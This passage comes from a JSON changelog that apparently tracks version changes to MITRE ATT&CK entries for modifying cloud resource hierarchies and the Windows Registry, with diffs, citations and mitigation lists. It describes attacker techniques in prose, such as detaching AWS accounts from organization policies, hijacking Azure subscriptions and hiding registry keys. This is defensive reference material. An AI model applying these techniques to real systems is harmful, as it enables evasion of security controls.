registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS re Inforce Trust Mod)\", \"old_value\": \"Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service (IaaS) environments in order to evade defenses.  \\n\\nIaaS environments often group resources into a hierarchy, enabling improved resource management and application of policies to relevant groups. Hierarchical structures differ among cloud providers. For example, in AWS environments, multiple accounts can be grouped under a single organization, while in Azure environments, multiple subscriptions can be grouped under a single management group.(Citation: AWS Organizations)(Citation: Microsoft Azure Resources)\\n\\nAdversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\\n\\nIn AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)\", \"diff\": \"--- \\n+++ \\n@@ -4,4 +4,4 @@\\n \\n Adversaries may add, delete, or otherwise modify resource groups within an IaaS hierarchy. For example, in Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources. They may also engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant. This will allow the adversary to use the victim\\u2019s compute resources without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm 2023)(Citation: Microsoft Subscription Hijacking 2022)\\n \\n-In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)\\n+In AWS environments, adversaries with appropriate permissions in a given account may call the `LeaveOrganization` API, causing the account to be severed from the AWS Organization to which it was tied and removing any Service Control Policies, guardrails, or restrictions imposed upon it by its former Organization. Alternatively, adversaries may call the `CreateAccount` API in order to create a new account within an AWS Organization. This account will use the same payment methods registered to the payment account but may not be subject to existing detections or Service Control Policies.(Citation: AWS re Inforce Trust Mod)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"AWS re Inforce Trust Mod\", \"old_value\": \"AWS RE:Inforce Threat Detection 2024\", \"new_path\": \"root['external_references'][1]['source_name']\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"AWS re Inforce. (2024, June). Retrieved April 15, 2026.\", \"old_value\": \"Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024.\", \"new_path\": \"root['external_references'][1]['description']\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf\", \"old_value\": \"https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf\", \"new_path\": \"root['external_references'][1]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to0__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to0__0\"><a href=\"#difflib_chg_to0__top\">t</a></td><td class=\"diff_header\" id=\"from0_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;modify&nbsp;hierarchical&nbsp;structures&nbsp;in</td><td class=\"diff_next\"><a href=\"#difflib_chg_to0__top\">t</a></td><td class=\"diff_header\" id=\"to0_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;attempt&nbsp;to&nbsp;modify&nbsp;hierarchical&nbsp;structures&nbsp;in</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;infrastructure-as-a-service&nbsp;(IaaS)&nbsp;environments&nbsp;in&nbsp;order&nbsp;to</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;infrastructure-as-a-service&nbsp;(IaaS)&nbsp;environments&nbsp;in&nbsp;order&nbsp;to</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;evade&nbsp;defenses.&nbsp;&nbsp;&nbsp;&nbsp;IaaS&nbsp;environments&nbsp;often&nbsp;group&nbsp;resources&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;evade&nbsp;defenses.&nbsp;&nbsp;&nbsp;&nbsp;IaaS&nbsp;environments&nbsp;often&nbsp;group&nbsp;resources&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">into&nbsp;a&nbsp;hierarchy,&nbsp;enabling&nbsp;improved&nbsp;resource&nbsp;management&nbsp;and&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">into&nbsp;a&nbsp;hierarchy,&nbsp;enabling&nbsp;improved&nbsp;resource&nbsp;management&nbsp;and&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">application&nbsp;of&nbsp;policies&nbsp;to&nbsp;relevant&nbsp;groups.&nbsp;Hierarchical&nbsp;str</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">application&nbsp;of&nbsp;policies&nbsp;to&nbsp;relevant&nbsp;groups.&nbsp;Hierarchical&nbsp;str</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uctures&nbsp;differ&nbsp;among&nbsp;cloud&nbsp;providers.&nbsp;For&nbsp;example,&nbsp;in&nbsp;AWS&nbsp;en</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">uctures&nbsp;differ&nbsp;among&nbsp;cloud&nbsp;providers.&nbsp;For&nbsp;example,&nbsp;in&nbsp;AWS&nbsp;en</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vironments,&nbsp;multiple&nbsp;accounts&nbsp;can&nbsp;be&nbsp;grouped&nbsp;under&nbsp;a&nbsp;single&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vironments,&nbsp;multiple&nbsp;accounts&nbsp;can&nbsp;be&nbsp;grouped&nbsp;under&nbsp;a&nbsp;single&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">organization,&nbsp;while&nbsp;in&nbsp;Azure&nbsp;environments,&nbsp;multiple&nbsp;subscrip</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">organization,&nbsp;while&nbsp;in&nbsp;Azure&nbsp;environments,&nbsp;multiple&nbsp;subscrip</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;can&nbsp;be&nbsp;grouped&nbsp;under&nbsp;a&nbsp;single&nbsp;management&nbsp;group.(Citati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tions&nbsp;can&nbsp;be&nbsp;grouped&nbsp;under&nbsp;a&nbsp;single&nbsp;management&nbsp;group.(Citati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;AWS&nbsp;Organizations)(Citation:&nbsp;Microsoft&nbsp;Azure&nbsp;Resources)&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on:&nbsp;AWS&nbsp;Organizations)(Citation:&nbsp;Microsoft&nbsp;Azure&nbsp;Resources)&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Adversaries&nbsp;may&nbsp;add,&nbsp;delete,&nbsp;or&nbsp;otherwise&nbsp;modify&nbsp;resource&nbsp;g</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Adversaries&nbsp;may&nbsp;add,&nbsp;delete,&nbsp;or&nbsp;otherwise&nbsp;modify&nbsp;resource&nbsp;g</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">roups&nbsp;within&nbsp;an&nbsp;IaaS&nbsp;hierarchy.&nbsp;For&nbsp;example,&nbsp;in&nbsp;Azure&nbsp;enviro</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">roups&nbsp;within&nbsp;an&nbsp;IaaS&nbsp;hierarchy.&nbsp;For&nbsp;example,&nbsp;in&nbsp;Azure&nbsp;enviro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nments,&nbsp;an&nbsp;adversary&nbsp;who&nbsp;has&nbsp;gained&nbsp;access&nbsp;to&nbsp;a&nbsp;Global&nbsp;Admin</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nments,&nbsp;an&nbsp;adversary&nbsp;who&nbsp;has&nbsp;gained&nbsp;access&nbsp;to&nbsp;a&nbsp;Global&nbsp;Admin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">istrator&nbsp;account&nbsp;may&nbsp;create&nbsp;new&nbsp;subscriptions&nbsp;in&nbsp;which&nbsp;to&nbsp;de</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">istrator&nbsp;account&nbsp;may&nbsp;create&nbsp;new&nbsp;subscriptions&nbsp;in&nbsp;which&nbsp;to&nbsp;de</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ploy&nbsp;resources.&nbsp;They&nbsp;may&nbsp;also&nbsp;engage&nbsp;in&nbsp;subscription&nbsp;hijacki</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ploy&nbsp;resources.&nbsp;They&nbsp;may&nbsp;also&nbsp;engage&nbsp;in&nbsp;subscription&nbsp;hijacki</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;by&nbsp;transferring&nbsp;an&nbsp;existing&nbsp;pay-as-you-go&nbsp;subscription&nbsp;fr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ng&nbsp;by&nbsp;transferring&nbsp;an&nbsp;existing&nbsp;pay-as-you-go&nbsp;subscription&nbsp;fr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">om&nbsp;a&nbsp;victim&nbsp;tenant&nbsp;to&nbsp;an&nbsp;adversary-controlled&nbsp;tenant.&nbsp;This&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">om&nbsp;a&nbsp;victim&nbsp;tenant&nbsp;to&nbsp;an&nbsp;adversary-controlled&nbsp;tenant.&nbsp;This&nbsp;w</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ill&nbsp;allow&nbsp;the&nbsp;adversary&nbsp;to&nbsp;use&nbsp;the&nbsp;victim\u2019s&nbsp;compute&nbsp;resource</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ill&nbsp;allow&nbsp;the&nbsp;adversary&nbsp;to&nbsp;use&nbsp;the&nbsp;victim\u2019s&nbsp;compute&nbsp;resource</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;without&nbsp;generating&nbsp;logs&nbsp;on&nbsp;the&nbsp;victim&nbsp;tenant.(Citation:&nbsp;Mi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;without&nbsp;generating&nbsp;logs&nbsp;on&nbsp;the&nbsp;victim&nbsp;tenant.(Citation:&nbsp;Mi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">crosoft&nbsp;Peach&nbsp;Sandstorm&nbsp;2023)(Citation:&nbsp;Microsoft&nbsp;Subscripti</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">crosoft&nbsp;Peach&nbsp;Sandstorm&nbsp;2023)(Citation:&nbsp;Microsoft&nbsp;Subscripti</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;Hijacking&nbsp;2022)&nbsp;&nbsp;In&nbsp;AWS&nbsp;environments,&nbsp;adversaries&nbsp;with&nbsp;ap</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;Hijacking&nbsp;2022)&nbsp;&nbsp;In&nbsp;AWS&nbsp;environments,&nbsp;adversaries&nbsp;with&nbsp;ap</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">propriate&nbsp;permissions&nbsp;in&nbsp;a&nbsp;given&nbsp;account&nbsp;may&nbsp;call&nbsp;the&nbsp;`Leave</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">propriate&nbsp;permissions&nbsp;in&nbsp;a&nbsp;given&nbsp;account&nbsp;may&nbsp;call&nbsp;the&nbsp;`Leave</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Organization`&nbsp;API,&nbsp;causing&nbsp;the&nbsp;account&nbsp;to&nbsp;be&nbsp;severed&nbsp;from&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Organization`&nbsp;API,&nbsp;causing&nbsp;the&nbsp;account&nbsp;to&nbsp;be&nbsp;severed&nbsp;from&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;AWS&nbsp;Organization&nbsp;to&nbsp;which&nbsp;it&nbsp;was&nbsp;tied&nbsp;and&nbsp;removing&nbsp;any&nbsp;Ser</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;AWS&nbsp;Organization&nbsp;to&nbsp;which&nbsp;it&nbsp;was&nbsp;tied&nbsp;and&nbsp;removing&nbsp;any&nbsp;Ser</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vice&nbsp;Control&nbsp;Policies,&nbsp;guardrails,&nbsp;or&nbsp;restrictions&nbsp;imposed&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vice&nbsp;Control&nbsp;Policies,&nbsp;guardrails,&nbsp;or&nbsp;restrictions&nbsp;imposed&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pon&nbsp;it&nbsp;by&nbsp;its&nbsp;former&nbsp;Organization.&nbsp;Alternatively,&nbsp;adversarie</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pon&nbsp;it&nbsp;by&nbsp;its&nbsp;former&nbsp;Organization.&nbsp;Alternatively,&nbsp;adversarie</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;may&nbsp;call&nbsp;the&nbsp;`CreateAccount`&nbsp;API&nbsp;in&nbsp;order&nbsp;to&nbsp;create&nbsp;a&nbsp;new&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s&nbsp;may&nbsp;call&nbsp;the&nbsp;`CreateAccount`&nbsp;API&nbsp;in&nbsp;order&nbsp;to&nbsp;create&nbsp;a&nbsp;new&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">account&nbsp;within&nbsp;an&nbsp;AWS&nbsp;Organization.&nbsp;This&nbsp;account&nbsp;will&nbsp;use&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">account&nbsp;within&nbsp;an&nbsp;AWS&nbsp;Organization.&nbsp;This&nbsp;account&nbsp;will&nbsp;use&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;same&nbsp;payment&nbsp;methods&nbsp;registered&nbsp;to&nbsp;the&nbsp;payment&nbsp;account&nbsp;but</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e&nbsp;same&nbsp;payment&nbsp;methods&nbsp;registered&nbsp;to&nbsp;the&nbsp;payment&nbsp;account&nbsp;but</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;not&nbsp;be&nbsp;subject&nbsp;to&nbsp;existing&nbsp;detections&nbsp;or&nbsp;Service&nbsp;Contro</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;may&nbsp;not&nbsp;be&nbsp;subject&nbsp;to&nbsp;existing&nbsp;detections&nbsp;or&nbsp;Service&nbsp;Contro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;Policies.(Citation:&nbsp;AWS&nbsp;<span class=\"diff_chg\">RE:</span>Inforce&nbsp;T<span class=\"diff_chg\">hreat&nbsp;Detection&nbsp;2024</span>)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">l&nbsp;Policies.(Citation:&nbsp;AWS&nbsp;<span class=\"diff_chg\">re&nbsp;</span>Inforce&nbsp;T<span class=\"diff_chg\">rust&nbsp;Mod</span>)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit",
                            "M1054: Software Configuration"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0155: Detection Strategy for Modify Cloud Resource Hierarchy"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:23.587000+00:00",
                    "modified": "2026-04-16 20:07:53.021000+00:00",
                    "name": "Modify Registry",
                    "description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "persistence"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1112",
                            "external_id": "T1112"
                        },
                        {
                            "source_name": "CISA Russian Gov Critical Infra 2018",
                            "description": "CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.",
                            "url": "https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors"
                        },
                        {
                            "source_name": "CISA LockBit 2023",
                            "description": "CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.",
                            "url": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a"
                        },
                        {
                            "source_name": "Avaddon Ransomware 2021",
                            "description": "Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.",
                            "url": "https://arxiv.org/pdf/2102.04796"
                        },
                        {
                            "source_name": "Microsoft BlackCat Jun 2022",
                            "description": "Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/"
                        },
                        {
                            "source_name": "Microsoft Reg",
                            "description": "Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.",
                            "url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
                        },
                        {
                            "source_name": "Microsoft Remote",
                            "description": "Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.",
                            "url": "https://technet.microsoft.com/en-us/library/cc754820.aspx"
                        },
                        {
                            "source_name": "SpectorOps Hiding Reg Jul 2017",
                            "description": "Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.",
                            "url": "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353"
                        },
                        {
                            "source_name": "Microsoft Reghide NOV 2006",
                            "description": "Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.",
                            "url": "https://docs.microsoft.com/sysinternals/downloads/reghide"
                        },
                        {
                            "source_name": "TrendMicro POWELIKS AUG 2014",
                            "description": "Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows Registry. Retrieved August 9, 2018.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/"
                        },
                        {
                            "source_name": "Unit42 BabyShark Feb 2019",
                            "description": "Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.",
                            "url": "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Bartosz Jerzman",
                        "David Lu, Tripwire",
                        "Gerardo Santos",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:53.021000+00:00\", \"old_value\": \"2025-10-24 17:48:49.294000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\\n\\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\\n\\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to impair defenses, such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\\n\\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\\n\\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)\", \"old_value\": \"Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\\n\\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\\n\\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\\n\\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\\n\\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)\", \"diff\": \"--- \\n+++ \\n@@ -2,7 +2,7 @@\\n \\n Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\\n \\n-The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat 